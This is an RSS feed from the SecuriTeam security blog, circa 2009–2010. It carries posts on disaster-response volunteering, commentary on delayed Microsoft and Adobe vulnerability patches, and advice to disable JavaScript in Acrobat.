<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="wordpress/2.6" -->
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>SecuriTeam Blogs</title>
	<link>http://blogs.securiteam.com</link>
	<description>Thoughts about the world of security</description>
	<pubDate>Sat, 30 Jan 2010 23:48:10 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
			<item>
		<title>Thoughts on Haiti, Olympics, and other disasters</title>
		<link>http://blogs.securiteam.com/index.php/archives/1346</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1346#comments</comments>
		<pubDate>Sat, 30 Jan 2010 23:48:10 +0000</pubDate>
		<dc:creator>p1</dc:creator>
		
		<category>Commentary</category>

		<category>Culture</category>

		<category>OT</category>

		<category>OPSEC</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1346</guid>
		<description><![CDATA[Absent those who have gone gaga over the iPad, the top news for the past two weeks has been the earthquake and disaster in Haiti.  The concern, the outpourings of support (and, yes, the malware and phishing sites that have been attempting to capitalize on the crisis) are all reminiscent of the tsunami, Katrina, and [...]]]></description>
			<content:encoded><![CDATA[<p>Absent those who have gone gaga over the iPad, the top news for the past two weeks has been the earthquake and disaster in Haiti.  The concern, the outpourings of support (and, yes, the malware and phishing sites that have been attempting to capitalize on the crisis) are all reminiscent of the tsunami, Katrina, and other events stretching back in time.</p>
<p>Haiti has been different.  The major factor has been the total breakdown of infrastructure, and the consequent difficulty in getting the help to those who need it most.</p>
<p>Those of us in the security communities are always interested in disasters.  We are forever dealing with crises, both large and small, assessing risks, planning and comparing mitigation strategies, and looking at the management of it all.  So, I recall that, when Katrina struck, there were endless discussions of the latest details, the structures, the organization (and lack thereof) in the followup efforts.  One person made a donation to a charity, and challenged the group to match his gift.  I upped the stakes.  I challenged everyone to get trained for disasters.</p>
<p>Unfortunately for the point I&#8217;m trying to make, I am speaking from a position of privilege.  Canada has the best emergency structure in the world.  (Our disaster response team is in Haiti at the moment, and is always one of the first on the ground whenever there is a major incident, anywhere.)  British Columbia has the best emergency response management system in Canada.  (No, I&#8217;m not volunteering at the Olympics.  But for the past year, I&#8217;ve been working with a group that has been planning for the fact that, with the big event in town, even a minor crisis is probably going to mean that we may have to provide emergency lodging for a few hundred people.)  And the North Shore, where I live, has the best disaster training regime in BC.  (The group lodging thing isn&#8217;t done by VANOC: it&#8217;s an effort by the ESS volunteers from the North Shore, Vancouver, and Richmond.)</p>
<p>Emergency response, in a major disaster, is not simply a matter of having water, generators, blankets, and rescue dogs.  It has to do with organization, co-ordination, management, and, particularly, trained people.  Most of them volunteers, since nobody can afford to pay for a full-time staff of all those you need to have ready in an emergency.</p>
<p>That&#8217;s where you come in.</p>
<p>Get trained.</p>
<p>There is some emergency measures organization that covers your area, regardless of where you live.  Your local municpality probably has an office.  And they probably need volunteers.  And they provide training.</p>
<p>If you volunteer, you will probably get trained.  For free.  (You may also get additional perqs.  I get my flu shots paid for every year, since I&#8217;m an emergency worker.)</p>
<p>First of all, you&#8217;ll probably get trained on what you need for you and your family.  What do you need to survive the first 72 hours following a disaster?  Do you know how much water, what type of food, etc, you need, in the event of a total failure of utilities and other factors we rely on?</p>
<p>Then there are the skills you need to help other people.  Sometimes this might relate to first aid, or structural assessment of buildings after an earthquake, etc.  However, there are many necessary skills that are not quite so dramatic.  Most emergency response, believe it or not, has to do with paperwork.  Who is safe?  Who needs care?  Do families need to be reunited?  Documentation of all of this is a huge effort, which goes on long after the bottles of water and hot meals have been distributed.</p>
<p>Then there are management skills, to co-ordinate all of the other skills.  An awful lot of &#8220;charity&#8221; gets wasted because some people get too much help, and others don&#8217;t get enough.  Someone needs to oversee the efforts.</p>
<p>Training in all of this is available.  And, in an emergency, having trained people is probably more important than having stockpiles of tents.  Trained people can make or improvise shelter.</p>
<p>Maybe your municipality or county doesn&#8217;t have a formal emergency structure.  In that case, there are organizations covering the gap.  In Canada, the government doesn&#8217;t do it all.  The Red Cross and Salvation Army are two of the groups that have been working on this for years, and have specialists.  In BC we have courses provided by the Justice Institute in a number of areas.  The provincial government has created a marvelous structure, ensuring consistent organizational layout for all sizes and types of disasters, and all types of response.  But we don&#8217;t bother reinventing the wheel.  In our formal training curriculum, a number of the courses are prepared, provided and run by the groups that have been doing it for years, and know it best.  If your government doesn&#8217;t have the courses available, go to those who do.  They are around.</p>
<p>(For those who have security related certifications, like the CISSP, ongoing professional education is a requirement.  A constant complaint is that training is expensive, and getting the credits costs too much.  I get all kinds of training related to business continuity and disaster recovery.  I get almost all of it free.)</p>
<p>Get trained.  Volunteer.  You&#8217;ll get a wealth of experience that will help you plan for all kinds of events, not just for major disasters, but for the minor incidents that plague us and our companies every day.  You&#8217;ll be ready for the big stuff, too.  You&#8217;ll be able to keep yourself and those near to you safe.  You&#8217;ll be able to make a difference to others, certainly reducing suffering, and possibly saving lives.  If and when something major happens, you will be a part of the infrastructure necessary for the response to be effective.  You&#8217;ll be part of the solution, rather than part of the problem.
<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1346&amp;title=Thoughts+on+Haiti%2C+Olympics%2C+and+other+disasters"rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1346&amp;title=Thoughts+on+Haiti%2C+Olympics%2C+and+other+disasters"rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=Thoughts+on+Haiti%2C+Olympics%2C+and+other+disasters&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1346"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1346"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1346&amp;title=Thoughts+on+Haiti%2C+Olympics%2C+and+other+disasters"rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1346&amp;title=Thoughts+on+Haiti%2C+Olympics%2C+and+other+disasters"rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1346&amp;title=Thoughts+on+Haiti%2C+Olympics%2C+and+other+disasters"rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1346&amp;t=Thoughts+on+Haiti%2C+Olympics%2C+and+other+disasters"rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1346&amp;title=Thoughts+on+Haiti%2C+Olympics%2C+and+other+disasters"rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1346"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=Thoughts+on+Haiti%2C+Olympics%2C+and+other+disasters&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1346" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Make your website safer. Use an external <a href="http://www.beyondsecurity.com/vulnerability-scanner.html">vulnerability scanner</a>. Nothing to install, zero maintenance!</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1346/feed/</wfw:commentRss>
		</item>
		<item>
		<title>So Microsoft has known about the IE vulnerability (CVE-2010-0249) since last September.</title>
		<link>http://blogs.securiteam.com/index.php/archives/1344</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1344#comments</comments>
		<pubDate>Fri, 22 Jan 2010 12:50:14 +0000</pubDate>
		<dc:creator>xyberpix</dc:creator>
		
		<category>Microsoft</category>

		<category>Commentary</category>

		<category>Corporate Security</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1344</guid>
		<description><![CDATA[So, let me get this straight, MS was informed about this vulnerability by a security researcher (Meron Sellen) last August, and it&#8217;s sat in the Microsoft Security Response Center&#8217;s queue to be fixed until Google got hacked, and then they checked their queue to see if they knew about it?
Even though this was acknowledged in [...]]]></description>
			<content:encoded><![CDATA[<p>So, let me get this straight, MS was informed about this vulnerability by a security researcher (Meron Sellen) last August, and it&#8217;s sat in the Microsoft Security Response Center&#8217;s queue to be fixed until Google got hacked, and then they checked their queue to see if they knew about it?</p>
<p>Even though this was acknowledged in September, and MS planned to ship the patch in a cumulative IE update next month, so that&#8217;s 6 months, really? Wow, I thought that Adobe had it tough with not having enough developers to patch<br />
This really makes me question the worlds largest OS developer, I have to say. The following questions come to mind though.</p>
<p>- If this was passed to them last September, do they have that many bugs in their code that they haven&#8217;t gotten around to this one yet?</p>
<p>- What happened to MS&#8217;s secure development program if something like this can get missed?</p>
<p>-  As it&#8217;s the fault of a software development house that another 33 companies were hacked, will any legal action be taken against then for this?</p>
<p>- Will/Could Google sue MS for damages if they do decide to pull out of China because of this hack?</p>
<p>Just random thoughts, but hey&#8230;
<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1344&amp;title=So+Microsoft+has+known+about+the+IE+vulnerability+%28CVE-2010-0249%29+since+last+September."rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1344&amp;title=So+Microsoft+has+known+about+the+IE+vulnerability+%28CVE-2010-0249%29+since+last+September."rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=So+Microsoft+has+known+about+the+IE+vulnerability+%28CVE-2010-0249%29+since+last+September.&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1344"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1344"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1344&amp;title=So+Microsoft+has+known+about+the+IE+vulnerability+%28CVE-2010-0249%29+since+last+September."rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1344&amp;title=So+Microsoft+has+known+about+the+IE+vulnerability+%28CVE-2010-0249%29+since+last+September."rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1344&amp;title=So+Microsoft+has+known+about+the+IE+vulnerability+%28CVE-2010-0249%29+since+last+September."rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1344&amp;t=So+Microsoft+has+known+about+the+IE+vulnerability+%28CVE-2010-0249%29+since+last+September."rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1344&amp;title=So+Microsoft+has+known+about+the+IE+vulnerability+%28CVE-2010-0249%29+since+last+September."rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1344"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=So+Microsoft+has+known+about+the+IE+vulnerability+%28CVE-2010-0249%29+since+last+September.&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1344" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Is your site safe from SQL Injection? <a href="http://www.beyondsecurity.com/vulnerability-scanner.html">Website Security Audit</a> is the way to protect your network!</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1344/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Adobe 0-Day (CVE-2009-4324) Fix To Be Pushed 12th January 2010</title>
		<link>http://blogs.securiteam.com/index.php/archives/1340</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1340#comments</comments>
		<pubDate>Thu, 17 Dec 2009 08:32:03 +0000</pubDate>
		<dc:creator>xyberpix</dc:creator>
		
		<category>Commentary</category>

		<category>Full Disclosure</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1340</guid>
		<description><![CDATA[Well, what more can I say really, good old Adobe have decided that it&#8217;s better to hold off on this patch, then to have people working around the clock to try and get this out asap. I suppose they also need to have some time off, after all it is close to Yule, and well [...]]]></description>
			<content:encoded><![CDATA[<p>Well, what more can I say really, good old Adobe have decided that it&#8217;s better to hold off on this patch, then to have people working around the clock to try and get this out asap. I suppose they also need to have some time off, after all it is close to Yule, and well they have been really good at releasing patches in a reasonable timescale this year (cough!).</p>
<p>This is the statement from Adobe, which can be found <a href="http://blogs.adobe.com/asset/2009/12/background_on_reader_update_sh.html"title="here" >here</a>.</p>
<p>&#8220;<em>We posted an update to Security Advisory <a href="http://www.adobe.com/support/security/advisories/apsa09-07.html">APSA09-07</a> that reflects the target ship date of January 12, 2010 for the update to remediate vulnerability CVE-2009-4324. I thought folks might be interested in some of the analysis that went into developing the schedule for the fix, so let me share some of the details in this post. </em></p>
<p><em>We evaluated two different options for patching this vulnerability:<br />
</em></p>
<ol><em><br />
</em></p>
<li><em>Stop everything else and start work immediately on an out-of-cycle security update to resolve this vulnerability with a one-off fix. We made major investments as part of our <a href="http://blogs.adobe.com/asset/2009/05/adobe_reader_and_acrobat_secur.html">security initiative</a> earlier this year that allow us to deliver patches more quickly. We estimated that delivering an out-of-cycle update would require somewhere between two and three weeks. Unfortunately, this option would also negatively impact the timing of the next quarterly security update for Adobe Reader and Acrobat scheduled for January 12, 2010.</em></li>
<li><em>Roll the fix for vulnerability CVE-2009-4324 into the code branch for the scheduled January 12, 2010 release. The team determined that by putting additional resources over the holidays towards the engineering and testing work required to ship a high confidence fix for this issue with low risk of introducing any new problems, they could deliver the fix as part of the quarterly update on January 12, 2010.<br />
</em></li>
<p><em><br />
</em></ol>
<p><em>Two important considerations that contributed to our decision to select the second option:<br />
</em></p>
<ul><em><br />
</em></p>
<li><em>JavaScript Blacklist mitigation - This new feature, introduced in Adobe Reader and Acrobat versions 9.2 and 8.1.7, with the quarterly update in October, allows individuals as well as administrators of large enterprise managed desktop environments to easily disable access to individual JavaScript APIs. More details on the JavaScript Blacklist mitigation are available <a href="http://go.adobe.com/kb/ts_cpsid_53237_en-us">here</a>. The feature design and our testing for this specific vulnerability indicate the JavaScript Blacklist is an effective mitigation against the threat without breaking other workflows that rely on JavaScript or other JavaScript APIs. </em></li>
<p><em><br />
</em></p>
<li><em>Customer schedules - The next quarterly security update for Adobe Reader and Acrobat, scheduled for release on January 12, 2010, will address a number of security vulnerabilities that were responsibly disclosed to Adobe. We are eager to get fixes for these issues out to our users on schedule. Many organizations are in the process of preparing for the January 12, 2010 update. The delay an out-of-cycle security update would force on the regularly scheduled quarterly release represents a significant negative. Additionally, an informal poll we conducted indicated that most of the organizations we talked with were in favor of the second option to better align with their schedules.<br />
</em></li>
<p><em><br />
</em></ul>
<p><em><br />
This is just a brief description of some of the points we considered in our analysis. Ultimately, the decision came down to what we could do to best mitigate threats to our customers, a critical priority to everyone at Adobe - and one we take very seriously.&#8221;</em></p>
<p>I can really see how they are taking this one seriously, as 4 weeks to roll out a critical patch to one of the most widely used applications on the planet really isn&#8217;t that bad if you think it, as that&#8217;s got to be at least 2 people working on this one. I actually thought that Adobe had more than a couple of developers, but I guess I was wrong.
<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1340&amp;title=Adobe+0-Day+%28CVE-2009-4324%29+Fix+To+Be+Pushed+12th+January+2010"rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1340&amp;title=Adobe+0-Day+%28CVE-2009-4324%29+Fix+To+Be+Pushed+12th+January+2010"rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=Adobe+0-Day+%28CVE-2009-4324%29+Fix+To+Be+Pushed+12th+January+2010&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1340"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1340"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1340&amp;title=Adobe+0-Day+%28CVE-2009-4324%29+Fix+To+Be+Pushed+12th+January+2010"rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1340&amp;title=Adobe+0-Day+%28CVE-2009-4324%29+Fix+To+Be+Pushed+12th+January+2010"rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1340&amp;title=Adobe+0-Day+%28CVE-2009-4324%29+Fix+To+Be+Pushed+12th+January+2010"rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1340&amp;t=Adobe+0-Day+%28CVE-2009-4324%29+Fix+To+Be+Pushed+12th+January+2010"rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1340&amp;title=Adobe+0-Day+%28CVE-2009-4324%29+Fix+To+Be+Pushed+12th+January+2010"rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1340"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=Adobe+0-Day+%28CVE-2009-4324%29+Fix+To+Be+Pushed+12th+January+2010&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1340" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Make your website safer. Use an external <a href="http://www.beyondsecurity.com/vulnerability-scanner.html">vulnerability scanner</a>. Nothing to install, zero maintenance!</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1340/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Adobe 0-day vulnerability (CVE-2009-4324) - what this means?</title>
		<link>http://blogs.securiteam.com/index.php/archives/1339</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1339#comments</comments>
		<pubDate>Wed, 16 Dec 2009 21:56:20 +0000</pubDate>
		<dc:creator>Juha-Matti</dc:creator>
		
		<category>Web</category>

		<category>Commentary</category>

		<category>Virus</category>

		<category>Corporate Security</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1339</guid>
		<description><![CDATA[     
      
#1 Disable JavaScript. Deploy a system to deliver this setting to all workstations. This is not the last Adobe 0-day which we will see.

What this means?

Go to Edit>Preferences menu, select item &#8216;JavaScript&#8217;, Uncheck &#8220;Enable Acrobat JavaScript&#8221; and to save the setting click &#8216;OK&#8217;.

  [...]]]></description>
			<content:encoded><![CDATA[<p><meta name="Title" /> <meta name="Keywords" /> <meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> <meta content="Word.Document" name="ProgId" /> <meta content="Microsoft Word 2008" name="Generator" /> <meta content="Microsoft Word 2008" name="Originator" /></p>
<link rel="File-List" /><!--[if gte mso 9]><xml>  <o :DocumentProperties>   </o><o :Template>Normal.dotm</o>   <o :Revision>0</o>   <o :TotalTime>0</o>   <o :Pages>1</o>   <o :Words>52</o>   <o :Characters>301</o>   <o :Company></o>   <o :Lines>2</o>   <o :Paragraphs>1</o>   <o :CharactersWithSpaces>369</o>   <o :Version>12.0</o>    <o :OfficeDocumentSettings>   <o :AllowPNG/>  </o> </xml>< ![endif]--><!--[if gte mso 9]><xml>  <w :WordDocument>   </w><w :Zoom>0</w>   <w :TrackMoves>false</w>   <w :TrackFormatting/>   <w :PunctuationKerning/>   <w :DrawingGridHorizontalSpacing>18 pt</w>   <w :DrawingGridVerticalSpacing>18 pt</w>   <w :DisplayHorizontalDrawingGridEvery>0</w>   <w :DisplayVerticalDrawingGridEvery>0</w>   <w :ValidateAgainstSchemas/>   <w :SaveIfXMLInvalid>false</w>   <w :IgnoreMixedContent>false</w>   <w :AlwaysShowPlaceholderText>false</w>   <w :Compatibility>    <w :BreakWrappedTables/>    <w :DontGrowAutofit/>    <w :DontAutofitConstrainedTables/>    <w :DontVertAlignInTxbx/>   </w>   </xml>< ![endif]--><!--[if gte mso 9]><xml>  <w :LatentStyles DefLockedState="false" LatentStyleCount="276">  </w> </xml>< ![endif]--> <style> <!--  /* Font Definitions */ @font-face 	{font-family:Cambria; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:3 0 0 0 1 0;}  /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0cm; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-ascii-font-family:Cambria; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Cambria; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Cambria; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} @page Section1 	{size:612.0pt 792.0pt; 	margin:72.0pt 90.0pt 72.0pt 90.0pt; 	mso-header-margin:36.0pt; 	mso-footer-margin:36.0pt; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --> </style> <!--[if gte mso 10]> <style>  /* Style Definitions */ table.MsoNormalTable 	{mso-style-name:&#8221;Table Normal&#8221;; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:&#8221;"; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:&#8221;Times New Roman&#8221;; 	mso-ascii-font-family:Cambria; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:&#8221;Times New Roman&#8221;; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Cambria; 	mso-hansi-theme-font:minor-latin;} </style> < ![endif]-->  <!--StartFragment-->
